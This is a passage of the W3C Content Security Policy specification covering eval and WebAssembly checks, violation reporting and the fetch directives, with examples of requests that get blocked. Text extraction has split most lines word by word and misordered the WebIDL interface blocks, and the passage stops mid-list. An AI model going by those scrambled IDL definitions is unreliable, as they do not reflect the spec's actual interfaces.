"
EvalError
"
if
not:
-
If compilationType is "
TIMER
", then:-
Let sourceString be codeString .
-
-
Else:
-
Let compilationSink be "Function" if compilationType is "
FUNCTION
", and "eval" otherwise. -
Let isTrusted be
true
if bodyArg implementsTrustedScript
, andfalse
otherwise. -
If isTrusted is
true
then:-
If bodyString is not equal to bodyArg ’s data , set isTrusted to
false
.
-
-
If isTrusted is
true
, then:-
Assert: parameterArgs ’ [list/size=] is equal to [parameterStrings]' size .
-
For each index of the range 0 to |parameterArgs]' [list/size=]:
-
Let arg be parameterArgs [ index ].
-
If arg implements
TrustedScript
, then:-
if parameterStrings [ index ] is not equal to arg ’s data , set isTrusted to
false
.
-
-
Otherwise, set isTrusted to
false
.
-
-
-
Let sourceToValidate be a new
TrustedScript
object created in realm whose data is set to codeString if isTrusted istrue
, and codeString otherwise. -
Let sourceString be the result of executing the Get Trusted Type compliant string algorithm, with
TrustedScript
, realm , sourceToValidate , compilationSink , and'script'
. -
If the algorithm throws an error, throw an
EvalError
. -
If sourceString is not equal to codeString , throw an
EvalError
.
-
-
Let result be "
Allowed
". -
Let global be realm ’s global object .
-
For each policy of global ’s CSP list :
-
Let source-list be null.
-
If policy contains a directive whose name is "
script-src
", then set source-list to that directive ’s value .Otherwise if policy contains a directive whose name is "
default-src
", then set source-list to that directive’s value . -
If source-list is not null:
-
Let trustedTypesRequired be the result of executing Does sink type require trusted types? , with realm ,
'script'
, andfalse
. -
If trustedTypesRequired is
true
and source-list contains a source expression which is an ASCII case-insensitive match for the string "'trusted-types-eval'
", then skip the following steps. -
If source-list contains a source expression which is an ASCII case-insensitive match for the string "
'unsafe-eval'
", then skip the following steps. -
Let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on global , policy , and "
script-src
". -
Set violation ’s resource to "
eval
". -
If source-list contains the expression "
'report-sample'
", then set violation ’s sample to the substring of sourceString containing its first 40 characters. -
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
If result is "
Blocked
", throw anEvalError
exception.
4.5. Integration with WebAssembly
WebAssembly
defines
the
HostEnsureCanCompileWasmBytes()
abstract
operation
which
allows
the
host
environment
to
block
the
compilation
of
WebAssembly
sources
into
executable
code.
This
document
defines
an
implementation
of
this
abstract
operation
which
examines
the
relevant
CSP
list
to
determine
whether
such
compilation
ought
to
be
blocked.
4.5.1. EnsureCSPDoesNotBlockWasmByteCompilation realm
Given
a
realm
realm
,
this
algorithm
returns
normally
if
compilation
is
allowed,
and
throws
a
WebAssembly.CompileError
if
not:
-
Let global be realm ’s global object .
-
Let result be "
Allowed
". -
For each policy of global ’s CSP list :
-
Let source-list be null.
-
If policy contains a directive whose name is "
script-src
", then set source-list to that directive ’s value .Otherwise if policy contains a directive whose name is "
default-src
", then set source-list to that directive’s value . -
If source-list is non-null, and does not contain a source expression which is an ASCII case-insensitive match for the string "
'unsafe-eval'
", and does not contain a source expression which is an ASCII case-insensitive match for the string "'wasm-unsafe-eval'
", then:-
Let violation be the result of executing § 2.4.1 Create a violation object for global, policy, and directive on global , policy , and "
script-src
". -
Set violation ’s resource to "
wasm-eval
". -
Execute § 5.5 Report a violation on violation .
-
If policy ’s disposition is "
enforce
", then set result to "Blocked
".
-
-
-
If result is "
Blocked
", throw aWebAssembly.CompileError
exception.
5. Reporting
When one or more of a policy ’s directives is violated, a csp violation report may be generated and sent out to a reporting endpoint associated with the policy .
csp violation reports have the report type "csp-violation".
csp
violation
reports
are
visible
to
ReportingObserver
s
.
dictionary :
CSPViolationReportBody ReportBody {USVString ;
documentURL USVString ?;
referrer USVString ?;
blockedURL DOMString ;
effectiveDirective DOMString ;
originalPolicy USVString ?;
sourceFile DOMString ?;
sample SecurityPolicyViolationEventDisposition ;
disposition unsigned short ;
statusCode unsigned long ?;
lineNumber unsigned long ?; };
columnNumber
When
a
directive
that
impacts
script-like
destinations
has
a
report-sha256
,
report-sha384
or
report-sha512
value,
and
a
request
with
a
script-like
destination
is
fetched,
a
csp
hash
report
will
be
generated
and
sent
out
to
a
reporting
endpoint
associated
with
the
policy
.
csp hash reports have the report type "csp-hash".
csp
hash
reports
are
not
visible
to
ReportingObserver
s
.
A csp hash report body is a struct with the following fields: documentURL , subresourceURL , hash , destination , type .
Reporting-Endpoints: hashes-endpoint="https://example.com/reports" Content-Security-Policy: script-src 'self' 'report-sha256'; report-to hashes-endpoint
and the document loads the script "main.js", a report similar to the following one will be sent:
POST /reports HTTP / 1.1 Host : example.com ... Content-Type: application/reports+json [{ "type": "csp-hash", "age": 12, "url": "https://example.com/", "user_agent": "Mozilla/5.0 (X11; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0", "body": { "document_url": "https://example.com/", "subresource_url": "https://example.com/main.js", "hash": "sha256-85738f8f9a7f1b04b5329c590ebcb9e425925c6d0984089c43a022de4f19c281", "type": "subresource", "destination": "script" } }]
5.1. Violation DOM Events
enum {
SecurityPolicyViolationEventDisposition ,
"enforce" }; [
"report" Exposed =(Window ,Worker )]interface :
SecurityPolicyViolationEvent Event {(
constructor DOMString ,
type optional SecurityPolicyViolationEventInit = {});
eventInitDict readonly attribute USVString ;
documentURI readonly attribute USVString ;
referrer readonly attribute USVString ;
blockedURI readonly attribute DOMString ;
effectiveDirective readonly attribute DOMString ; // historical alias of effectiveDirective
violatedDirective readonly attribute DOMString ;
originalPolicy readonly attribute USVString ;
sourceFile readonly attribute DOMString ;
sample readonly attribute SecurityPolicyViolationEventDisposition ;
disposition readonly attribute unsigned short ;
statusCode readonly attribute unsigned long ;
lineNumber readonly attribute unsigned long ; };
columnNumber dictionary :
SecurityPolicyViolationEventInit EventInit {USVString = "";
documentURI USVString = "";
referrer USVString = "";
blockedURI DOMString = "";
violatedDirective DOMString = "";
effectiveDirective DOMString = "";
originalPolicy USVString = "";
sourceFile DOMString = "";
sample SecurityPolicyViolationEventDisposition = "enforce";
disposition unsigned short = 0;
statusCode unsigned long = 0;
lineNumber unsigned long = 0; };
columnNumber
5.2.
Obtain
the
blockedURI
of
a
violation’s
resource
Given a violation’s resource resource , this algorithm returns a string , to be used as the blocked URI field for violation reports.
-
If resource is a URL , return the result of executing § 5.4 Strip URL for use in reports on resource .
-
Return resource .
5.3. Obtain the deprecated serialization of violation
Given
a
violation
violation
,
this
algorithm
returns
a
JSON
text
string
representation
of
the
violation,
suitable
for
submission
to
a
reporting
endpoint
associated
with
the
deprecated
report-uri
directive.
-
Let body be a map with its keys initialized as follows:
-
"
document-uri
" -
The result of executing § 5.4 Strip URL for use in reports on violation ’s url .
-
"
referrer
" -
The result of executing § 5.4 Strip URL for use in reports on violation ’s referrer .
-
"
blocked-uri
" -
The result of executing § 5.2 Obtain the blockedURI of a violation’s resource on violation ’s resource .
-
"
effective-directive
" -
violation ’s effective directive
-
"
violated-directive
" -
violation ’s effective directive
-
"
original-policy
" -
The serialization of violation ’s policy
-
"
disposition
" -
The disposition of violation ’s policy
-
"
status-code
" -
violation ’s status
-
"
script-sample
" -
violation ’s sample
Note: The name
script-sample
was chosen for compatibility with an earlier iteration of this feature which has shipped in Firefox since its initial implementation of CSP. Despite the name, this field will contain samples for non-script violations, like stylesheets. The data contained in aSecurityPolicyViolationEvent
object, and in reports generated via the newreport-to
directive, is named in a more encompassing fashion:sample
.
-
"
-
If violation ’s source file is not null:
-
Set body ["
source-file
'] to the result of executing § 5.4 Strip URL for use in reports on violation ’s source file . -
Set body ["
line-number
"] to violation ’s line number . -
Set body ["
column-number
"] to violation ’s column number .
-
-
Assert: If body ["
blocked-uri
"] is not "inline
", then body ["sample
"] is the empty string. -
Return the result of serialize an infra value to JSON bytes given «[ "csp-report" → body ]».
5.4. Strip URL for use in reports
Given a URL url , this algorithm returns a string representing the URL for use in violation reports:-
If url ’s scheme is not an HTTP(S) scheme , then return url ’s scheme .
-
Set url ’s fragment to the empty string.
-
Set url ’s username to the empty string.
-
Set url ’s password to the empty string.
-
Return the result of executing the URL serializer on url .
5.5. Report a violation
Given
a
violation
violation
,
this
algorithm
reports
it
to
the
endpoint
specified
in
violation
’s
policy
,
and
fires
a
SecurityPolicyViolationEvent
at
violation
’s
element
,
or
at
violation
’s
global
object
as
described
below:
-
Let global be violation ’s global object .
-
Let target be violation ’s element .
-
Queue a task to run the following steps:
Note: We "queue a task" here to ensure that the event targeting and dispatch happens after JavaScript completes execution of the task responsible for a given violation (which might manipulate the DOM).
-
If target is not null, and global is a
Window
, and target ’s shadow-including root is not global ’s associatedDocument
, set target to null.Note: This ensures that we fire events only at elements connected to violation ’s policy ’s
Document
. If a violation is caused by an element which isn’t connected to that document, we’ll fire the event at the document rather than the element in order to ensure that the violation is visible to the document’s listeners. -
If target is null:
-
Set target to violation ’s global object .
-
If target is a
Window
, set target to target ’s associatedDocument
.
-
-
If target implements
EventTarget
, fire an event namedsecuritypolicyviolation
that uses theSecurityPolicyViolationEvent
interface at target with its attributes initialized as follows:-
documentURI
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s url .
-
referrer
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s referrer .
-
blockedURI
-
The result of executing § 5.2 Obtain the blockedURI of a violation’s resource on violation ’s resource .
-
effectiveDirective
-
violation ’s effective directive
-
violatedDirective
-
violation ’s effective directive
-
originalPolicy
-
The serialization of violation ’s policy
-
disposition
-
violation ’s disposition
-
sourceFile
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s source file , if violation ’s source file is not null, or null otherwise.
-
statusCode
-
violation ’s status
-
lineNumber
-
violation ’s line number
-
columnNumber
-
violation ’s column number
-
sample
-
violation ’s sample
-
bubbles
-
true
-
composed
-
true
Note: We set the
composed
attribute, which means that this event can be captured on its way into, and will bubble its way out of a shadow tree.target
, et al will be automagically scoped correctly for the main tree.Note: Both
effectiveDirective
andviolatedDirective
are the same value. This is intentional to maintain backwards compatibility. -
-
If violation ’s policy ’s directive set contains a directive named "
report-uri
" directive :-
If violation ’s policy ’s directive set contains a directive named "
report-to
", skip the remaining substeps. -
For each token of directive ’s value :
-
Let endpoint be the result of executing the URL parser with token as the input, and violation ’s url as the base URL .
-
If endpoint is not a valid URL, skip the remaining substeps.
-
Let request be a new request , initialized as follows:
- method
-
"
POST
" - url
-
endpoint
- origin
-
violation ’s global object ’s relevant settings object ’s origin
- traversable for user prompts
-
"
no-traversable
" - client
-
violation ’s global object ’s relevant settings object
- destination
-
"
report
" - initiator
-
""
- credentials mode
-
"
same-origin
" - keepalive
-
"
true
" - header list
-
A header list containing a single header whose name is "
Content-Type
", and value is "application/csp-report
" - body
-
The result of executing § 5.3 Obtain the deprecated serialization of violation on violation
- redirect mode
-
"
error
"
Note: request ’s mode defaults to "
no-cors
"; the response is ignored entirely. -
Fetch request . The result will be ignored.
-
Note: All of this should be considered deprecated. It sends a single request per violation, which simply isn’t scalable. As soon as this behavior can be removed from user agents, it will be.
Note:
report-uri
only takes effect ifreport-to
is not present. That is, the latter overrides the former, allowing for backwards compatibility with browsers that don’t support the new mechanism. -
-
If violation ’s policy ’s directive set contains a directive named "
report-to
" directive :-
Let body be a new
CSPViolationReportBody
, initialized as follows:-
documentURL
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s url .
-
referrer
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s referrer .
-
blockedURL
-
The result of executing § 5.2 Obtain the blockedURI of a violation’s resource on violation ’s resource .
-
effectiveDirective
-
violation ’s effective directive .
-
originalPolicy
-
The serialization of violation ’s policy .
-
sourceFile
-
The result of executing § 5.4 Strip URL for use in reports on violation ’s source file , if violation ’s source file is not null, or null otherwise.
-
sample
-
violation ’s sample .
-
disposition
-
violation ’s disposition .
-
statusCode
-
violation ’s status .
-
lineNumber
-
violation ’s line number , if violation ’s source file is not null, or null otherwise.
-
columnNumber
-
violation ’s column number , if violation ’s source file is not null, or null otherwise.
-
-
Let settings object be violation ’s global object ’s relevant settings object .
-
Generate and queue a report with the following arguments:
- context
-
settings object
- type
-
"csp-violation"
- destination
-
directive ’s value .
- data
-
body
-
-
6. Content Security Policy Directives
This specification defines a number of types of directives which allow developers to control certain aspects of their sites' behavior. This document defines directives which govern resource fetching (in § 6.1 Fetch Directives ), directives which govern the state of a document (in § 6.3 Document Directives ), directives which govern aspects of navigation (in § 6.4 Navigation Directives ), and directives which govern reporting (in § 6.5 Reporting Directives ). These form the core of Content Security Policy; other directives are defined in a modular fashion in ancillary documents (see § 6.6 Directives Defined in Other Documents for examples).
To mitigate the risk of cross-site scripting attacks, web developers SHOULD include directives that regulate sources of script and plugins. They can do so by including:
-
Both the script-src and object-src directives, or
-
a default-src directive
In
either
case,
developers
SHOULD
NOT
include
either
'unsafe-inline'
,
or
data:
as
valid
sources
in
their
policies.
Both
enable
XSS
attacks
by
allowing
code
to
be
included
directly
in
the
document
itself;
they
are
best
avoided
completely.
6.1. Fetch Directives
Fetch directives control the locations from which certain resource types may be loaded. For instance, script-src allows developers to allow trusted sources of script to execute on a page, while font-src controls the sources of web fonts.
6.1.1.
child-src
The
child-src
directive
governs
the
creation
of
child
navigables
(e.g.
iframe
and
frame
navigations)
and
Worker
execution
contexts.
The
syntax
for
the
directive’s
name
and
value
is
described
by
the
following
ABNF:
directive-name = "child-src" directive-value = serialized-source-list
This directive controls requests which will populate a frame or a worker. More formally, requests falling into one of the following categories:
-
destination is "
frame
", "iframe
", "object
", or "embed
". -
destination is either "
serviceworker
", "sharedworker
", or "worker
" (which are fed to the run a worker algorithm forServiceWorker
,SharedWorker
, andWorker
, respectively).
Content-Security-Policy: child-src https://example.com/
Fetches
for
the
following
code
will
all
return
network
errors,
as
the
URLs
provided
do
not
match
child-src
’s
source
list
:
< iframe src = "https://example.org" ></ iframe > < script > var blockedWorker= new Worker( "data:application/javascript,..." ); </ script >
6.1.1.1.
child-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
child-src
and policy is "No
", return "Allowed
". -
Return the result of executing the pre-request check for the directive whose name is name on request and policy , using this directive’s value for the comparison.
6.1.1.2.
child-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
child-src
and policy is "No
", return "Allowed
". -
Return the result of executing the post-request check for the directive whose name is name on request , response , and policy , using this directive’s value for the comparison.
6.1.2.
connect-src
The connect-src directive restricts the URLs which can be loaded using script interfaces. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "connect-src" directive-value = serialized-source-list
This
directive
controls
requests
which
transmit
or
receive
data
from
other
origins.
This
includes
APIs
like
fetch()
,
[XHR]
,
[EVENTSOURCE]
,
[BEACON]
,
and
a
’s
ping
.
This
directive
also
controls
WebSocket
[WEBSOCKETS]
connections,
though
those
aren’t
technically
part
of
Fetch.
EventSource
maintains
an
open
HTTP
connection
to
a
server
in
order
to
receive
push
notifications,
WebSockets
open
a
bidirectional
communication
channel
between
your
browser
and
a
server,
and
XMLHttpRequest
makes
arbitrary
HTTP
requests
on
your
behalf.
These
are
powerful
APIs
that
enable
useful
functionality,
but
also
provide
tempting
avenues
for
data
exfiltration.
The
connect-src
directive
allows
you
to
ensure
that
these
and
similar
sorts
of
connections
are
only
opened
to
origins
you
trust.
Sending
a
policy
that
defines
a
list
of
source
expressions
for
this
directive
is
straightforward.
For
example,
to
limit
connections
to
only
https://example.com
,
send
the
following
header:
Content-Security-Policy: connect-src https://example.com/
Fetches
for
the
following
code
will
all
return
network
errors,
as
the
URLs
provided
do
not
match
connect-src
’s
source
list
:
< a ping = "https://example.org" > ...< script > var xhr= new XMLHttpRequest(); xhr. open( 'GET' , 'https://example.org/' ); xhr. send(); var ws= new WebSocket( "wss://example.org/" ); var es= new EventSource( "https://example.org/" ); navigator. sendBeacon( "https://example.org/" , { ... }); </ script >
6.1.2.1.
connect-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
connect-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.2.2.
connect-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
connect-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.3.
default-src
The default-src directive serves as a fallback for the other fetch directives . The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "default-src" directive-value = serialized-source-list
If
a
default-src
directive
is
present
in
a
policy,
its
value
will
be
used
as
the
policy’s
default
source
list.
That
is,
given
default-src
'none';
script-src
'self'
,
script
requests
will
use
'self'
as
the
source
list
to
match
against.
Other
requests
will
use
'none'
.
This
is
spelled
out
in
more
detail
in
the
§ 4.1.2
Should
request
be
blocked
by
Content
Security
Policy?
and
§ 4.1.3
Should
response
to
request
be
blocked
by
Content
Security
Policy?
algorithms.
prefetch
and
preconnect
generate
requests
that
aren’t
tied
to
any
specific
fetch
directive
,
but
are
instead
governed
by
the
union
of
servers
allowed
in
all
of
a
policy’s
directives'
source
lists
.
If
default-src
is
not
specified,
these
requests
will
always
be
allowed.
For
more
information,
see
§ 8.6
Exfiltration
.
[HTML]
Content-Security-Policy: default-src 'self'
will have the same behavior as the following header:
Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self'; img-src 'self'; manifest-src 'self'; media-src 'self'; object-src 'self'; script-src-elem 'self'; script-src-attr 'self'; style-src-elem 'self'; style-src-attr 'self'; worker-src 'self'
That
is,
when
default-src
is
set,
every
fetch
directive
that
isn’t
explicitly
set
will
fall
back
to
the
value
default-src
specifies.
script-src
directive
is
explicitly
specified,
for
example,
then
the
value
of
default-src
has
no
influence
on
script
requests.
That
is,
the
following
header:
Content-Security-Policy: default-src 'self'; script-src-elem https://example.com
will have the same behavior as the following header:
Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self'; img-src 'self'; manifest-src 'self'; media-src 'self'; object-src 'self'; script-src-elem https://example.com; script-src-attr 'self'; style-src-elem 'self'; style-src-attr 'self'; worker-src 'self'
Given
this
behavior,
one
good
way
to
build
a
policy
for
a
site
would
be
to
begin
with
a
default-src
of
'none'
,
and
to
build
up
a
policy
from
there
which
allowed
only
those
resource
types
which
are
necessary
for
the
particular
page
the
policy
will
apply
to.
6.1.3.1.
default-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
default-src
and policy is "No
", return "Allowed
". -
Return the result of executing the pre-request check for the directive whose name is name on request and policy , using this directive’s value for the comparison.
6.1.3.2.
default-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
default-src
and policy is "No
", return "Allowed
". -
Return the result of executing the post-request check for the directive whose name is name on request , response , and policy , using this directive’s value for the comparison.
6.1.3.3.
default-src
Inline
Check
This directive’s inline check algorithm is as follows:
Given
an
Element
element
,
a
string
type
,
a
policy
policy
and
a
string
source
:
-
Let name be the result of executing § 6.8.2 Get the effective directive for inline checks on type .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
default-src
and policy is "No
", return "Allowed
". -
Otherwise, return the result of executing the inline check for the directive whose name is name on element , type , policy and source , using this directive’s value for the comparison.
6.1.4.
font-src
The font-src directive restricts the URLs from which font resources may be loaded. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "font-src" directive-value = serialized-source-list
Content-Security-Policy: font-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
error,
as
the
URL
provided
does
not
match
font-src
’s
source
list
:
< style > @ font-face { font-family : "Example Font" ; src : url ( "https://example.org/font" ); } body { font-family : "Example Font" ; } </ style >
6.1.4.1.
font-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
font-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.4.2.
font-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
font-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.5.
frame-src
The frame-src directive restricts the URLs which may be loaded into child navigables . The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "frame-src" directive-value = serialized-source-list
Content-Security-Policy: frame-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
frame-src
’s
source
list
:
< iframe src = "https://example.org/" > </ iframe >
6.1.5.1.
frame-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
frame-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.5.2.
frame-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
frame-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.6.
img-src
The img-src directive restricts the URLs from which image resources may be loaded. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "img-src" directive-value = serialized-source-list
This
directive
controls
requests
which
load
images.
More
formally,
this
includes
requests
whose
destination
is
"
image
"
[FETCH]
.
Content-Security-Policy: img-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
img-src
’s
source
list
:
< img src = "https://example.org/img" >
6.1.6.1.
img-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
img-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.6.2.
img-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
img-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.7.
manifest-src
The manifest-src directive restricts the URLs from which application manifests may be loaded [APPMANIFEST] . The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "manifest-src" directive-value = serialized-source-list
Content-Security-Policy: manifest-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
manifest-src
’s
source
list
:
< link rel = "manifest" href = "https://example.org/manifest" >
6.1.7.1.
manifest-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
manifest-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.7.2.
manifest-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
manifest-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.8.
media-src
The media-src directive restricts the URLs from which video, audio, and associated text track resources may be loaded. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "media-src" directive-value = serialized-source-list
Content-Security-Policy: media-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
media-src
’s
source
list
:
< audio src = "https://example.org/audio" ></ audio > < video src = "https://example.org/video" > < track kind = "subtitles" src = "https://example.org/subtitles" > </ video >
6.1.8.1.
media-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
media-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.8.2.
media-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
media-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.9.
object-src
The object-src directive restricts the URLs from which plugin content may be loaded. The syntax for the directive’s name and value is described by the following ABNF:
directive-name = "object-src" directive-value = serialized-source-list
Content-Security-Policy: object-src https://example.com/
Fetches
for
the
following
code
will
return
a
network
errors,
as
the
URL
provided
do
not
match
object-src
’s
source
list
:
< embed src = "https://example.org/flash" ></ embed > < object data = "https://example.org/flash" ></ object >
If
plugin
content
is
loaded
without
an
associated
URL
(perhaps
an
object
element
lacks
a
data
attribute,
but
loads
some
default
plugin
based
on
the
specified
type
),
it
MUST
be
blocked
if
object-src
’s
value
is
'none'
,
but
will
otherwise
be
allowed.
Note:
The
object-src
directive
acts
upon
any
request
made
on
behalf
of
an
object
or
embed
element.
This
includes
requests
which
would
populate
the
child
navigable
generated
by
the
former
two
(also
including
navigations).
This
is
true
even
when
the
data
is
semantically
equivalent
to
content
which
would
otherwise
be
restricted
by
another
directive,
such
as
an
object
element
with
a
text/html
MIME
type.
Note:
When
a
plugin
resource
is
navigated
to
directly
(that
is,
as
a
plugin
inside
a
navigable
,
and
not
as
an
embedded
subresource
via
embed
or
object
),
any
policy
delivered
along
with
that
resource
will
be
applied
to
the
resulting
Document
.
This
means,
for
instance,
that
developers
can
prevent
the
execution
of
arbitrary
resources
as
plugin
content
by
delivering
the
policy
object-src
'none'
along
with
a
response.
Given
plugins'
power
(and
the
sometimes-interesting
security
model
presented
by
Flash
and
others),
this
could
mitigate
the
risk
of
attack
vectors
like
Rosetta
Flash
.
6.1.9.1.
object-src
Pre-request
check
This directive’s pre-request check is as follows:
Given a request request and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
object-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.5 Does request match source list? on request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.9.2.
object-src
Post-request
check
This directive’s post-request check is as follows:
Given a request request , a response response , and a policy policy :
-
Let name be the result of executing § 6.8.1 Get the effective directive for request on request .
-
If the result of executing § 6.8.4 Should fetch directive execute on name ,
object-src
and policy is "No
", return "Allowed
". -
If the result of executing § 6.7.2.6 Does response to request match source list? on response , request , this directive’s value , and policy , is "
Does Not Match
", return "Blocked
". -
Return "
Allowed
".
6.1.10.
script-src
The
script-src
directive
restricts
the
locations
from
which
scripts
may
be
executed.
This
includes
not
only
URLs
loaded
directly
into
script
elements,
but
also
things
like
inline
script
blocks
and
XSLT
stylesheets
[XSLT]
which
can
trigger
script
execution.
The
syntax
for
the
directive’s
name
and
value
is
described
by
the
following
ABNF:
directive-name = "script-src" directive-value = serialized-source-list
The
script-src
directive
acts
as
a
default
fallback
for
all
script-like
destinations
(including
worker-specific
destinations
if
worker-src
is
not
present).
Unless
granularity
is
desired
script-src
should
be
used
in
favor
of
script-src-attr
and
script-src-elem
as
in
most
situations
there
is
no
particular
reason
to
have
separate
lists
of
permissions
for
inline
event
handlers
and
script
elements.
The
script-src
directive
governs
six
things:
-
Script requests MUST pass through § 4.1.2 Should request be blocked by Content Security Policy? .
-
Script responses MUST pass through § 4.1.3 Should response to request be blocked by Content Security Policy? .
-
Inline
script
blocks MUST pass through § 4.2.3 Should element’s inline type behavior be blocked by Content Security Policy? . Their behavior will be blocked unless every policy allows inline script, either implicitly by not specifying ascript-src
(ordefault-src
) directive, or explicitly, by specifying "unsafe-inline
", a nonce-source or a hash-source that matches the inline block. -
The following JavaScript execution sinks are gated on the "
unsafe-eval
" and "trusted-types-eval
" source expressions:-
setTimeout()
with an initial argument which is not callable. -
